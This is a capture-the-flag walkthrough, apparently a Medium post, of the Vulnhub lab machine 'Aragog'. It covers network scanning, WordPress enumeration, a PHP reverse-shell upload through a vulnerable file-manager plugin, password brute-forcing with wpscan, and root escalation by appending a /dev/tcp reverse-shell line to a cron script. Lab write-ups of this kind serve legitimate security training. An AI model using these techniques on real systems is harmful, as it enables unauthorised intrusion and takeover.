HarryPotter: Aragog

Description

Back to the Top

Aragog is the 1st VM of 3-box HarryPotter VM series in which you need to find 2 horcruxes hidden inside the machine (total 8 horcruxes hidden across 3 VMs of the HarryPotter Series) and ultimately defeat Voldemort.

This is the part 1 out of 3 VMs submitted on Vulnhub, So lets get started with it:

First of all lets check out the IP of the machine so that I can move ahead with the service enumeration.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# netdiscover -i vboxnet1
Currently scanning: 192.168.20.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
____________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 08:00:27:f3:04:f7 1 42 PCS Systemtechnik GmbH
192.168.1.101 08:00:27:30:fb:c8 1 60 PCS Systemtechnik GmbH

Service Scan:

Now lets get the services running on the VM to proceed further.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# nmap -v -sT -sC -p- -A 192.168.1.101 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 15:59 IST
..............
Nmap scan report for 192.168.1.101
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:30:FB:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Uptime guess: 41.396 days (since Thu Mar 25 06:29:32 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here I got only two services running on it but looking ahead for the service exploits of respective versions got nothing may be thats a bed-luck of mine.

http://192.168.1.101/ 

Calling the ip on web got nothing but a single image.

I have nothing but the tool “dirb” may help further.

┌──(s4t0sh㉿N4TR0)-[~]
└─$ dirb http://192.168.1.101 130 ⨯

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed May 5 16:16:20 2021
URL_BASE: http://192.168.1.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.101/ ----
==> DIRECTORY: http://192.168.1.101/blog/
+ http://192.168.1.101/index.html (CODE:200|SIZE:97)
==> DIRECTORY: http://192.168.1.101/javascript/
+ http://192.168.1.101/server-status (CODE:403|SIZE:278)

---- Entering directory: http://192.168.1.101/blog/ ----
+ http://192.168.1.101/blog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.101/blog/wp-admin/
==> DIRECTORY: http://192.168.1.101/blog/wp-content/
==> DIRECTORY: http://192.168.1.101/blog/wp-includes/
+ http://192.168.1.101/blog/xmlrpc.php (CODE:405|SIZE:42)

Here wordpress is running on the machine in another directory named “blog” so I switched to web without wasting nay time.

http://192.168.1.101/blog/wp-admin

I fired the wpscan tool on this to get more details.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# wpscan --url http://192.168.1.101/blog/ -e ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart


[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.1.101/blog/wp-content/plugins/akismet/
| Latest Version: 4.1.9
| Last Updated: 2021-03-02T18:10:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/akismet/, status: 500
|
| The version could not be determined.

[+] wp-file-manager
| Location: http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/
| Last Updated: 2021-03-30T06:37:00.000Z
| Readme: http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/readme.txt
| [!] The version is out of date, the latest version is 7.1.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/, status: 200
|
| Version: 6.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/readme.txt

And the vulnerable plugin is with me, I checked the exploit and got it.

I uploaded my php reverse shell file.

As the path o f the file is already displayed here after it get upload so I fired up a listener to get the shell.

http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/files/install.php

And here I got it. On further enumerating here I got the first flag on this series which is a base64 encrypted.

horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

Further checking the /home directory I got two users named “ginny” and “hagrid98” so I used them to check the user name of wordpress and got that “hagrid98” is a wordpress user. So to get the password I brute forced it.

┌──(root💀N4TR0)-[/home/s4t0sh/Downloads]
└─# wpscan --url http://192.168.1.101/blog/ -U hagrid98 -P /usr/share/wordlists/rockyou.txt -t 10 _________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________


[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - hagrid98 / password123
Trying hagrid98 / password123 Time: 00:00:17 < > (1390 / 14345782) 0.00% ETA: ??:??:??

hagrid98 : password123

I switched to the user hagrid98 and enumerated further but got nothing, so I switched to cronjobs running on it.

Used a tool named “pspy” to monitor the events running and found that a file named “.backup.sh” in “opt” directory is running as root every 2 minutes apx.

./pspy64 -p

Without wasting much time I used the .backup.sh file to get the root shell and put a listener on to get the shell.

hagrid98@Aragog:/opt$  echo "bash -i >& /dev/tcp/192.168.1.1/1212 0>&1 " >> .backup.sh
<i >& /dev/tcp/192.168.1.1/1212 0>&1 " >> .backup.sh
hagrid98@Aragog:/opt$ cat .backup.sh
cat .backup.sh
#!/bin/bash

cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads
bash -i >& /dev/tcp/192.168.1.1/1212 0>&1
root@Aragog:~# cat horcrux2.txt
cat horcrux2.txt
____ _ _ _ _
/ ___|___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
| | / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\____\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/


Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Easy
Machine Name: Aragog
Horcruxes Hidden in this VM: 2 horcruxes

You have successfully pwned Aragog machine.
Here is your second hocrux: horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}

Here I got the root privileges of the machine.

Enjoyed and learned much with this VM thanks to the author of the VM.

Hope you like it. For any query DM me.

❤❤HAPPY HACKING❤❤

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

DC-SIDS meet at the Global Internet Governance Forum.

Islander x Avalaunch AMA session in Islander Community recap

Cyber security events that will shape 2019: a review of industry predictions

DarkShield refund announcement

{UPDATE} T-Rex Survival Simulator Hack Free Resources Generator

Follow the money: Exploring CWT ransomware, a crypto laundering case

The ELMAS Phone

Diary of a kind-hearted hacker: Part 3

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
A-s4t0sh

A-s4t0sh

More from Medium

5 Reasons You Should Visit Ventura, CA

API Owasp Top 10 2019

api owasp

Importance of ISO in Mobile Photography

ISO in Mobile Photography by Saket Kumar

How to restrict SFTP Users Access